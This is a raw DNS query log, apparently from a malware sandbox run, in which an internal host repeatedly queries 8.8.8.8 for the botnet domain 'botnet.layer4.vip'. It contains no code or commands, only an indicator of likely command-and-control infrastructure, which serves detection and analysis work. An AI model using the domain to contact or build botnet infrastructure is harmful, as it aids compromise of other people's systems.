                                  Apr 9, 2023 03:30:46.788687944 CEST192.168.2.238.8.8.80xc048Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.813221931 CEST192.168.2.238.8.8.80xc048Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.837456942 CEST192.168.2.238.8.8.80xc048Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.862032890 CEST192.168.2.238.8.8.80xc048Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.886670113 CEST192.168.2.238.8.8.80xb13fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.902528048 CEST192.168.2.238.8.8.80xb13fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.918741941 CEST192.168.2.238.8.8.80xb13fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.934473991 CEST192.168.2.238.8.8.80xb13fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.950632095 CEST192.168.2.238.8.8.80xb13fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.974953890 CEST192.168.2.238.8.8.80xe5faStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.990839958 CEST192.168.2.238.8.8.80xe5faStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.015500069 CEST192.168.2.238.8.8.80xe5faStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.040092945 CEST192.168.2.238.8.8.80xe5faStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.055864096 CEST192.168.2.238.8.8.80xe5faStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.080851078 CEST192.168.2.238.8.8.80x6386Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.105135918 CEST192.168.2.238.8.8.80x6386Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.129569054 CEST192.168.2.238.8.8.80x6386Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.154098988 CEST192.168.2.238.8.8.80x6386Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.170120955 CEST192.168.2.238.8.8.80x6386Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.185890913 CEST192.168.2.238.8.8.80xb39cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.201488972 CEST192.168.2.238.8.8.80xb39cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.217485905 CEST192.168.2.238.8.8.80xb39cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.234210014 CEST192.168.2.238.8.8.80xb39cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.259473085 CEST192.168.2.238.8.8.80xb39cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.275142908 CEST192.168.2.238.8.8.80xccb3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.290771961 CEST192.168.2.238.8.8.80xccb3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.306366920 CEST192.168.2.238.8.8.80xccb3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.330884933 CEST192.168.2.238.8.8.80xccb3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.346846104 CEST192.168.2.238.8.8.80xccb3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.362524986 CEST192.168.2.238.8.8.80x61e5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.378393888 CEST192.168.2.238.8.8.80x61e5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.394412994 CEST192.168.2.238.8.8.80x61e5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.419143915 CEST192.168.2.238.8.8.80x61e5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.443418026 CEST192.168.2.238.8.8.80x61e5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.459737062 CEST192.168.2.238.8.8.80x3ae8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.483985901 CEST192.168.2.238.8.8.80x3ae8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.508208990 CEST192.168.2.238.8.8.80x3ae8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.532738924 CEST192.168.2.238.8.8.80x3ae8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.557141066 CEST192.168.2.238.8.8.80x3ae8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.573826075 CEST192.168.2.238.8.8.80x2c5eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.589714050 CEST192.168.2.238.8.8.80x2c5eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.613888025 CEST192.168.2.238.8.8.80x2c5eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.630800962 CEST192.168.2.238.8.8.80x2c5eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.646382093 CEST192.168.2.238.8.8.80x2c5eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.662658930 CEST192.168.2.238.8.8.80xc29cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.678826094 CEST192.168.2.238.8.8.80xc29cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.694897890 CEST192.168.2.238.8.8.80xc29cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.719100952 CEST192.168.2.238.8.8.80xc29cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.743758917 CEST192.168.2.238.8.8.80xc29cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.768280983 CEST192.168.2.238.8.8.80xc84Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.792522907 CEST192.168.2.238.8.8.80xc84Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.808374882 CEST192.168.2.238.8.8.80xc84Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.832931042 CEST192.168.2.238.8.8.80xc84Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.848846912 CEST192.168.2.238.8.8.80xc84Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.873445988 CEST192.168.2.238.8.8.80x8128Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.889038086 CEST192.168.2.238.8.8.80x8128Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.904958010 CEST192.168.2.238.8.8.80x8128Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.920912981 CEST192.168.2.238.8.8.80x8128Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.936459064 CEST192.168.2.238.8.8.80x8128Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.952084064 CEST192.168.2.238.8.8.80x6a75Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.976370096 CEST192.168.2.238.8.8.80x6a75Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:47.991949081 CEST192.168.2.238.8.8.80x6a75Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.015824080 CEST192.168.2.238.8.8.80x6a75Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.040216923 CEST192.168.2.238.8.8.80x6a75Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.064678907 CEST192.168.2.238.8.8.80x9496Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.080480099 CEST192.168.2.238.8.8.80x9496Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.104778051 CEST192.168.2.238.8.8.80x9496Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.120564938 CEST192.168.2.238.8.8.80x9496Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.136492014 CEST192.168.2.238.8.8.80x9496Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.152177095 CEST192.168.2.238.8.8.80xef00Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.176212072 CEST192.168.2.238.8.8.80xef00Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.191709995 CEST192.168.2.238.8.8.80xef00Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.207279921 CEST192.168.2.238.8.8.80xef00Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.223081112 CEST192.168.2.238.8.8.80xef00Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.247493029 CEST192.168.2.238.8.8.80xf11Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.263101101 CEST192.168.2.238.8.8.80xf11Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.278678894 CEST192.168.2.238.8.8.80xf11Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.294547081 CEST192.168.2.238.8.8.80xf11Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.318698883 CEST192.168.2.238.8.8.80xf11Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.343192101 CEST192.168.2.238.8.8.80x25bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.358999968 CEST192.168.2.238.8.8.80x25bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.374644041 CEST192.168.2.238.8.8.80x25bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.399106026 CEST192.168.2.238.8.8.80x25bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.414669037 CEST192.168.2.238.8.8.80x25bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.438782930 CEST192.168.2.238.8.8.80xb3e3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.462992907 CEST192.168.2.238.8.8.80xb3e3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.487063885 CEST192.168.2.238.8.8.80xb3e3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.511370897 CEST192.168.2.238.8.8.80xb3e3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.527224064 CEST192.168.2.238.8.8.80xb3e3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.551384926 CEST192.168.2.238.8.8.80x496aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.575898886 CEST192.168.2.238.8.8.80x496aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.591711998 CEST192.168.2.238.8.8.80x496aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.616106033 CEST192.168.2.238.8.8.80x496aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.640537977 CEST192.168.2.238.8.8.80x496aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.656529903 CEST192.168.2.238.8.8.80xd072Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.680655956 CEST192.168.2.238.8.8.80xd072Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.704735994 CEST192.168.2.238.8.8.80xd072Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.720681906 CEST192.168.2.238.8.8.80xd072Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.744851112 CEST192.168.2.238.8.8.80xd072Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.769273043 CEST192.168.2.238.8.8.80xc3b2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.785170078 CEST192.168.2.238.8.8.80xc3b2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.809601068 CEST192.168.2.238.8.8.80xc3b2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.834213972 CEST192.168.2.238.8.8.80xc3b2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.858375072 CEST192.168.2.238.8.8.80xc3b2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.874115944 CEST192.168.2.238.8.8.80xbdf7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.889975071 CEST192.168.2.238.8.8.80xbdf7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.906533003 CEST192.168.2.238.8.8.80xbdf7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.922055006 CEST192.168.2.238.8.8.80xbdf7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.940941095 CEST192.168.2.238.8.8.80xbdf7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.966337919 CEST192.168.2.238.8.8.80x68a3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:48.990933895 CEST192.168.2.238.8.8.80x68a3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.015290976 CEST192.168.2.238.8.8.80x68a3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.039701939 CEST192.168.2.238.8.8.80x68a3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.063882113 CEST192.168.2.238.8.8.80x68a3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.088115931 CEST192.168.2.238.8.8.80x62cfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.104094028 CEST192.168.2.238.8.8.80x62cfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.128320932 CEST192.168.2.238.8.8.80x62cfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.143887043 CEST192.168.2.238.8.8.80x62cfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.168272972 CEST192.168.2.238.8.8.80x62cfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.183881044 CEST192.168.2.238.8.8.80xc949Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.208007097 CEST192.168.2.238.8.8.80xc949Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.232659101 CEST192.168.2.238.8.8.80xc949Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.248604059 CEST192.168.2.238.8.8.80xc949Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.272897959 CEST192.168.2.238.8.8.80xc949Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.297125101 CEST192.168.2.238.8.8.80x1e92Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.321660995 CEST192.168.2.238.8.8.80x1e92Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.346199989 CEST192.168.2.238.8.8.80x1e92Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.370775938 CEST192.168.2.238.8.8.80x1e92Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.395359039 CEST192.168.2.238.8.8.80x1e92Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.419625044 CEST192.168.2.238.8.8.80x6398Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.435151100 CEST192.168.2.238.8.8.80x6398Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.459705114 CEST192.168.2.238.8.8.80x6398Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.475287914 CEST192.168.2.238.8.8.80x6398Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.499648094 CEST192.168.2.238.8.8.80x6398Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.524252892 CEST192.168.2.238.8.8.80xe17fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.539834976 CEST192.168.2.238.8.8.80xe17fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.564943075 CEST192.168.2.238.8.8.80xe17fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.589431047 CEST192.168.2.238.8.8.80xe17fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.604942083 CEST192.168.2.238.8.8.80xe17fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.620583057 CEST192.168.2.238.8.8.80xe6cdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.636540890 CEST192.168.2.238.8.8.80xe6cdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.652450085 CEST192.168.2.238.8.8.80xe6cdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.668441057 CEST192.168.2.238.8.8.80xe6cdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.692854881 CEST192.168.2.238.8.8.80xe6cdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.717494965 CEST192.168.2.238.8.8.80xab9dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.733047009 CEST192.168.2.238.8.8.80xab9dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.757487059 CEST192.168.2.238.8.8.80xab9dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.773102999 CEST192.168.2.238.8.8.80xab9dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.788935900 CEST192.168.2.238.8.8.80xab9dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.804848909 CEST192.168.2.238.8.8.80xf930Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.820487022 CEST192.168.2.238.8.8.80xf930Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.836091042 CEST192.168.2.238.8.8.80xf930Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.851979017 CEST192.168.2.238.8.8.80xf930Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.867783070 CEST192.168.2.238.8.8.80xf930Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.883711100 CEST192.168.2.238.8.8.80x6244Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.899250031 CEST192.168.2.238.8.8.80x6244Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.915211916 CEST192.168.2.238.8.8.80x6244Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.931051970 CEST192.168.2.238.8.8.80x6244Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.946548939 CEST192.168.2.238.8.8.80x6244Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.970696926 CEST192.168.2.238.8.8.80x7bf7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:49.995151043 CEST192.168.2.238.8.8.80x7bf7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.010627031 CEST192.168.2.238.8.8.80x7bf7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.026070118 CEST192.168.2.238.8.8.80x7bf7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.041923046 CEST192.168.2.238.8.8.80x7bf7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.057682991 CEST192.168.2.238.8.8.80x893bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.081733942 CEST192.168.2.238.8.8.80x893bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.097248077 CEST192.168.2.238.8.8.80x893bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.121490955 CEST192.168.2.238.8.8.80x893bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.137399912 CEST192.168.2.238.8.8.80x893bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.162033081 CEST192.168.2.238.8.8.80xee3cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.186444044 CEST192.168.2.238.8.8.80xee3cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.210561037 CEST192.168.2.238.8.8.80xee3cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.234735012 CEST192.168.2.238.8.8.80xee3cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.259196997 CEST192.168.2.238.8.8.80xee3cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.283361912 CEST192.168.2.238.8.8.80x42ffStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.299329042 CEST192.168.2.238.8.8.80x42ffStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.323736906 CEST192.168.2.238.8.8.80x42ffStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.348190069 CEST192.168.2.238.8.8.80x42ffStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.364020109 CEST192.168.2.238.8.8.80x42ffStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.388554096 CEST192.168.2.238.8.8.80xef5bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.412995100 CEST192.168.2.238.8.8.80xef5bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.437099934 CEST192.168.2.238.8.8.80xef5bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.452960968 CEST192.168.2.238.8.8.80xef5bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.477375984 CEST192.168.2.238.8.8.80xef5bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.493010998 CEST192.168.2.238.8.8.80x98d7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.508730888 CEST192.168.2.238.8.8.80x98d7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.524262905 CEST192.168.2.238.8.8.80x98d7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.540079117 CEST192.168.2.238.8.8.80x98d7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.555915117 CEST192.168.2.238.8.8.80x98d7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.580065012 CEST192.168.2.238.8.8.80xd45fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.604516983 CEST192.168.2.238.8.8.80xd45fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.620316029 CEST192.168.2.238.8.8.80xd45fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.644428968 CEST192.168.2.238.8.8.80xd45fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.668627977 CEST192.168.2.238.8.8.80xd45fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.684369087 CEST192.168.2.238.8.8.80x852cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.703356028 CEST192.168.2.238.8.8.80x852cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.727845907 CEST192.168.2.238.8.8.80x852cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
